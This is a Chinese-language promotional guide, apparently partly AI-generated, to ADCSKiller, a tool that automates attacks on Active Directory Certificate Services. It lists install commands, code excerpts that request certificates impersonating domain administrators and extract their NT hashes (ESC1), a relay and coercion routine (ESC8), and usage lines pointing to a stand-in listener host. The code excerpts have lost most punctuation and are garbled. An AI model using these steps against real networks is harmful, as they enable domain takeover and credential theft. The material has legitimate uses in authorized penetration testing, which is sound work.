ADCSKiller:终极ADCS漏洞自动化武器化工具完整指南

发布时间:2026/7/14 7:16:58
ADCSKiller:终极ADCS漏洞自动化武器化工具完整指南 ADCSKiller终极ADCS漏洞自动化武器化工具完整指南【免费下载链接】ADCSKillerAn ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer项目地址: https://gitcode.com/gh_mirrors/ad/ADCSKillerADCSKiller是一款基于Python的ADCS漏洞自动化武器化工具它整合了Certipy和Coercer的核心功能能够简化Active Directory证书服务ADCS基础设施的攻击流程。无论是漏洞发现还是利用执行这款工具都能为安全测试人员提供高效的自动化支持目前已成为ADCS渗透测试领域的重要工具。为什么选择ADCSKiller在企业网络安全评估中ADCS漏洞往往是攻击者获取域管理员权限的关键途径。传统测试方法需要手动操作多个工具步骤繁琐且容易出错。ADCSKiller的出现解决了这一痛点全流程自动化从证书模板枚举到漏洞利用无需人工干预多漏洞支持已集成ESC1、ESC8等常见ADCS漏洞检测与利用模块模块化设计基于Certipy和Coercer构建兼顾稳定性与扩展性详细输出报告自动生成JSON格式结果文件便于后续分析快速安装步骤使用前需确保系统已安装Python 3.6环境然后通过以下命令完成部署# 克隆项目仓库 git clone https://gitcode.com/gh_mirrors/ad/ADCSKiller cd ADCSKiller # 安装依赖组件 pip install -r requirements.txt # 安装Certipy git clone https://github.com/ly4k/Certipy cd Certipy python3 setup.py install # 安装Coercer git clone https://github.com/p0dalirius/Coercer cd Coercer pip install -r requirements.txt python3 setup.py install核心功能解析1. 漏洞自动发现ADCSKiller通过Certipy的枚举功能能够自动识别域内易受攻击的证书模板# 代码片段adcskiller.py 第98-125行 print([*] Trying to find vulnerable certificate templates) certipy_results subprocess.run([certipy, find, -u, f{self.__username}{self.__domain}, -p, self.__password, -dc-ip, self.__target, -vulnerable, -json, -output, self.__certipy_output_prefix], capture_outputTrue, textTrue).stdout工具会重点检测以下漏洞类型ESC1低权限用户可申请高权限证书ESC8证书服务中继攻击漏洞其他ADCS相关配置缺陷2. 域管理员权限获取针对发现的ESC1漏洞ADCSKiller会自动执行证书申请与哈希提取流程# 代码片段adcskiller.py 第298-313行 def exploit_esc1(self) - None: for admin in self.__domain_admins: for template in self.__vulnerable_certificate_templates[ESC1]: print(f[*] Exploiting ESC1 using the {admin} account) certipy_results subprocess.run([certipy, req, -u, f{self.__username}{self.__domain}, -p, self.__password, -target, self.__target, -ca, self.__ca, -template, template, -upn, admin, -out, f{template}_{admin}], capture_outputTrue, textTrue).stdout if Got certificate in certipy_results: print(f[] Got certificate for UPN {admin}) certipy_results subprocess.run([certipy, auth, -pfx, f{template}_{admin}.pfx, -domain, self.__domain, -username, admin, -dc-ip, self.__target], capture_outputTrue, textTrue).stdout if Got hash for in certipy_results: nthash re.search(rGot hash for .*: (\w:\w), certipy_results).group(1) print(f[] Received NT hash for {admin}: {nthash})3. 证书服务中继攻击对于ESC8漏洞工具采用多线程方式协调Certipy和Coercer进行攻击# 代码片段adcskiller.py 第314-343行 def exploit_esc8(self) - None: if self.__ca_dns not in self.__dc: print(f[*] Certificate authority {self.__ca_dns} is not a domain controller) certipy_thread CertipyRelay(1, CertipyRelayThread, self.__ca_dns) certipy_thread.start() time.sleep(5) coercer_thread Coercer(2, CoercerThread, self.__domain, self.__username, self.__password, self.__dc[0], self.__lhost) coercer_thread.start() coercer_thread.join() certipy_thread.join()基础使用指南命令格式ADCSKiller的基本调用格式如下python adcskiller.py -d 域名 -u 用户名 -p 密码 -dc-ip 域控IP -L 监听主机参数说明参数说明示例-d, --domain目标域名FQDN格式example.com-u, --username域用户名testuser-p, --password用户密码Pssw0rd!-dc-ip域控制器IP地址192.168.1.100-L, --lhost监听主机FQDNattacker.example.com典型使用场景场景1检测并利用ESC1漏洞python adcskiller.py -d example.com -u lowpriv -p LowPass123! -dc-ip 10.0.0.1 -L attacker.example.com执行后工具会枚举域内所有易受攻击的证书模板尝试为每个域管理员申请证书从证书中提取NTLM哈希场景2执行ESC8中继攻击当检测到证书服务未安装在域控制器上时工具会自动启动中继攻击流程获取高权限证书。高级配置与扩展输出文件解析工具会生成JSON格式的Certipy输出文件如20231115143022_Certipy.json包含以下关键信息证书颁发机构详情漏洞证书模板列表域管理员信息域控制器列表自定义漏洞模块ADCSKiller采用模块化设计可通过修改exploit_escX方法添加新的漏洞利用逻辑例如在Exploit类中添加def exploit_esc3(self) - None: # 自定义ESC3漏洞利用代码 pass然后在run_exploits方法中注册该模块certificate_exploits { ESC1: self.exploit_esc1, ESC3: self.exploit_esc3 # 添加新模块 }注意事项与法律声明授权测试使用ADCSKiller仅可在已获得明确授权的网络环境中进行法律合规未经授权的使用可能违反当地法律法规版本更新工具目前处于0.3版本后续将添加更多漏洞检测模块免责声明作者不对工具的非法使用承担任何责任参考资料项目许可证LICENSE核心代码实现adcskiller.pyCertipy项目https://github.com/ly4k/CertipyCoercer项目https://github.com/p0dalirius/Coercer通过ADCSKiller安全测试人员能够快速评估企业ADCS基础设施的安全状况及时发现并修复潜在漏洞有效防范证书服务相关的攻击风险。随着工具的不断更新它将成为ADCS安全评估领域不可或缺的自动化解决方案。【免费下载链接】ADCSKillerAn ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer项目地址: https://gitcode.com/gh_mirrors/ad/ADCSKiller创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻

佛山企业网站建设咨询:别被低价坑惨,揭秘那些不敢说的行业潜规则

佛山企业网站建设咨询:别被低价坑惨,揭秘那些不敢说的行业潜规则

内容: 佛山企业网站建设咨询说句掏心窝子的话,我在佛山这行混了快十年,见过太多老板因为贪便宜,最后把网站做成“电子垃圾”。前阵子有个做陶瓷机械的老哥,找我哭诉,说之前花三千块找个学生做的网站,不仅打开慢得像蜗牛,连个像样的后台都没有,想改个产品图都得求爷爷告…

发布时间:2026/7/14 7:16:37
搞不懂京东网站网站建设是什么?别瞎折腾,这3步帮你理清思路

搞不懂京东网站网站建设是什么?别瞎折腾,这3步帮你理清思路

很多老板一听到“京东网站网站建设是什么”这个问题,第一反应就是头大。明明在京东上有店,为啥还要搞个独立网站?是不是钱多烧得慌?错!大错特错。如果你还在纠结这个问题,那大概率是还没摸清楚电商下半场的玩法。今天我不讲那些虚头巴脑的理论,直接给你掰扯清楚,这玩意…

发布时间:2026/7/14 7:16:30
网站建设的具体任务有哪些方面?别再被忽悠,这几点才是核心

网站建设的具体任务有哪些方面?别再被忽悠,这几点才是核心

本文关键词:网站建设的具体任务有哪些方面说实话,每次看到有人把“建个网站”说得跟变魔术一样简单,我就一肚子火。很多老板或者刚入行的朋友,总觉得找个模板套一套,域名一买,网站就活了。这种想法简直是在给自己挖坑。如果你真想知道网站建设的具体任务有哪些方面,那就…

发布时间:2026/7/14 7:16:16
淘宝营销网站建设避坑指南:别再花冤枉钱做那种没人看的官网了

淘宝营销网站建设避坑指南:别再花冤枉钱做那种没人看的官网了

本文关键词:淘宝营销网站建设说实话,做这行五年了,见过太多老板拿着几百万预算去搞什么“高大上”的官网,结果上线三个月,除了自己亲戚朋友没人看。真的,别不信邪。前两天有个做服装批发的老哥找我哭诉,说之前找的那家公司,报价八万,做个静态页面,连个后台管理都简陋…

发布时间:2026/7/14 8:50:45
重庆网站建设小能手怎么挑?别被坑,老手掏心窝子分享

重庆网站建设小能手怎么挑?别被坑,老手掏心窝子分享

最近好多朋友问我,在重庆做网站,到底该找谁?说实话,这水挺深。我见过太多老板,花了几万块,最后拿到个像上世纪的网页。心累,真的心累。今天不整那些虚的,就聊聊我这几年踩过的坑和总结的经验。如果你也在纠结重庆网站建设小能手怎么选,这篇文你得看完。先说个真事。我…

发布时间:2026/7/14 8:50:26
网站建设风格定位太难?老站长掏心窝子分享,别再花冤枉钱了

网站建设风格定位太难?老站长掏心窝子分享,别再花冤枉钱了

做网站这么多年,见过太多老板花大价钱做个“高大上”的官网,结果客户进来一看,满脸问号。为啥?因为风格没定对。今天不整那些虚头巴脑的理论,直接说点大实话。很多同行为了多收钱,故意把风格搞复杂,其实根本没必要。咱们先说个真实案例。上周有个做工业设备的客户找我,…

发布时间:2026/7/14 8:49:43
别再到处求人了!手把手教你搞定网站建设与管理ppt课件百度云盘资源

别再到处求人了!手把手教你搞定网站建设与管理ppt课件百度云盘资源

做网页设计或者教课的朋友,是不是经常为了找一套靠谱的PPT课件头秃?网上搜一圈,要么全是广告,要么文件打不开。好不容易找到一个,还得先注册,再填手机号,最后下载下来一看,内容老旧得像是上个世纪的产物。这种体验,真的让人想摔键盘。今天我不讲大道理,只分享怎么高效…

发布时间:2026/7/14 8:49:39
西安哪家网站建设好?别被忽悠了,看完这篇省下一半冤枉钱

西安哪家网站建设好?别被忽悠了,看完这篇省下一半冤枉钱

本文关键词:西安哪家网站建设好最近好多老板私信问我,西安哪家网站建设好?说实话,这问题真没法直接给个名单,因为水太深了。我在西安干这行快八年了,见过太多同行为了抢单子,把PPT做得比代码还漂亮,结果交付出来的东西连个移动端都适配不了。今天我不讲那些虚头巴脑的理…

发布时间:2026/7/14 8:49:34
Stable Diffusion Turbo在AMD NPU上的实际应用案例:从创意到商业

Stable Diffusion Turbo在AMD NPU上的实际应用案例:从创意到商业

Stable Diffusion Turbo在AMD NPU上的实际应用案例:从创意到商业 【免费下载链接】stable-diffusion-turbo-amdnpu-onnx 项目地址: https://ai.gitcode.com/hf_mirrors/amd/stable-diffusion-turbo-amdnpu-onnx Stable Diffusion Turbo是一款快速生成式文本…

发布时间:2026/7/14 8:49:36
别被忽悠了!襄阳网络公司 网站建设 避坑指南:500块和5000块的真相

别被忽悠了!襄阳网络公司 网站建设 避坑指南:500块和5000块的真相

很多老板在找襄阳网络公司 网站建设 的时候,第一句话总是问:“做官网多少钱?”这时候如果你直接报个价,十有八九要挨骂。要么觉得你贵,要么觉得你便宜没好货。我在襄阳这行混了快十年,见过太多因为贪便宜最后网站打不开、数据泄露、甚至被扣尾款的案例。今天我不讲虚的,…

发布时间:2026/7/14 0:00:06
揭秘2024最大网站建设公司排名,小白避坑指南

揭秘2024最大网站建设公司排名,小白避坑指南

别再看那些所谓的“全球十大”榜单了。全是花钱买的广告位。你信了,你就输了。很多老板找公司建站,最后钱花了,网站还打不开。这不仅仅是技术问题,更是信息不对称的陷阱。今天我不讲虚的,直接告诉你怎么挑。毕竟,在“最大网站建设公司排名”里,最大的往往不是最好的。而…

发布时间:2026/7/14 0:00:44
别被那些吹上天的教程骗了,phpstudy建设网站视频教程里没人告诉你的三个血泪坑

别被那些吹上天的教程骗了,phpstudy建设网站视频教程里没人告诉你的三个血泪坑

本文关键词:phpstudy建设网站视频教程说实话,现在网上搜“phpstudy建设网站视频教程”,出来的东西真是一言难尽。要么就是几年前的老版本录屏,要么就是那种为了骗点击量,标题起得惊天动地,内容全是废话的营销号。我自己在本地搭环境的时候,也踩过不少坑,今天就不整那些…

发布时间:2026/7/14 0:02:45
别装了,你的学院网站建设推进会就是场大型尴尬现场

别装了,你的学院网站建设推进会就是场大型尴尬现场

看着后台那点可怜的访问量,你急不急?方案改了八版,还是没人看。今天这文,只说怎么把会开成,把事做成。上周去隔壁职院蹭会,那场面,真叫一个窒息。会议室里坐满了人,领导在台上讲PPT,底下的人不是在玩手机,就是在发呆。投影仪闪了两下,灭了。没人去修,接着讲。这种会…

发布时间:2026/7/14 8:24:42
七彩建设集团官方网站怎么找?避坑指南与真实体验分享

七彩建设集团官方网站怎么找?避坑指南与真实体验分享

找官网找得头大?这篇直接告诉你怎么辨别真伪,别被假网站坑了钱。昨天半夜两点,我还在电脑前盯着屏幕,心里那个急啊。家里装修刚进场,工长突然说需要确认一份材料清单,说是七彩建设那边要求的。我手忙脚乱地打开浏览器,搜了一堆“七彩建设”,结果出来一堆广告,什么“七…

发布时间:2026/7/14 2:42:40
找可信赖的龙岗网站建设公司?别踩坑,看这几点就够

找可信赖的龙岗网站建设公司?别踩坑,看这几点就够

做企业,网站就是脸面。 在龙岗,想找个靠谱的网站公司,真不容易。 市面上广告满天飞。 承诺得天花乱坠。 最后交付的东西,却让人想砸电脑。 今天不聊虚的。 只聊怎么避坑。 怎么找到真正可信赖的龙岗网站建设团队。先说个大实话。 别信什么“三天上线”。 那是骗小白的。 正…

发布时间:2026/7/13 8:40:50
建站7年才悟出的网站建设思路,别再花冤枉钱了

建站7年才悟出的网站建设思路,别再花冤枉钱了

做建站这行整整7年了。 见过太多老板花几万块, 最后做出来的网站像个垃圾场。 今天不整那些虚头巴脑的术语。 就聊聊我踩过的坑, 和真正能落地的网站建设思路。很多老板一上来就问: “多少钱能做个高大上的?” 我通常直接劝退。 因为方向错了, 你给再多钱也是打水漂。 真正…

发布时间:2026/7/11 8:50:55
合肥的网站建设避坑指南:别被低价忽悠,这3个细节决定生死

合肥的网站建设避坑指南:别被低价忽悠,这3个细节决定生死

做企业官网最怕什么?不是技术难,是交钱后没人管,或者上线一个月连个访客都没有。这篇东西不扯虚的,直接告诉你怎么在合肥找个靠谱的团队,或者自己怎么避坑。先说个大实话,我在合肥混这行五年多,见过太多老板因为贪便宜吃大亏。你去百度搜“合肥的网站建设”,出来一堆报…

发布时间:2026/7/10 18:05:06
别被忽悠了!德州网站建设那些坑,我拿真金白银换来的教训

别被忽悠了!德州网站建设那些坑,我拿真金白银换来的教训

做这行久了,心里就憋着一股火。每次看到客户拿着网上抄来的模板,问我能不能做成“苹果官网”那种效果。我就想笑。真的,太想笑了。今天咱不整那些虚头巴脑的专业术语。就聊聊德州网站建设里,那些让人头秃的真实事儿。我有个客户,老张。他是做德州本地建材的,实在人。当初…

发布时间:2026/7/13 2:08:03